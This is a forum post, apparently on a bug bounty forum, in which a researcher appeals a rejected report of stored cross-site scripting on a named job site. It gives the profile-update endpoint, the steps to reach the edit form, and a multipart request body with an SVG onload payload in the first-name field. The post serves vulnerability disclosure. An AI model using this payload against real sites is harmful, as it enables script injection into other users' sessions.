Rejected Submissions Issue.
Posted: Sat Jul 10, 2021 2:18 pm
Hi OBB team, my reject ID: 2074677. The vulnerable XSS web: www.kumarijob.com and POST /jobseeker/dashboard/update-profile HTTP/1.1, then path referer: https://www.kumarijob.com/jobseeker/dashboard/personal. Step by next step reduce login to the account, so path: /jobseeker/dashboard, go to the "Edit Profile" > Edit Basic Information. The vulnerable parameters are: Fullname, Middle Name, Last Name is effect, Cross site scripting (XSS). The post data download below, let check out!
----------------------------------------------------------------------------------------------------------
-----------------------------16088500688962087102208045996
Content-Disposition: form-data; name="fname"
"><svg onload=prompt("xss")>
-----------------------------16088500688962087102208045996
Content-Disposition: form-data; name="mname"
MN vuln Payload
-----------------------------16088500688962087102208045996
Content-Disposition: form-data; name="lname"
LN Vuln Payload
I hope as soon as possible to my "On Hold Vulnerabilities". Thank you, OBB.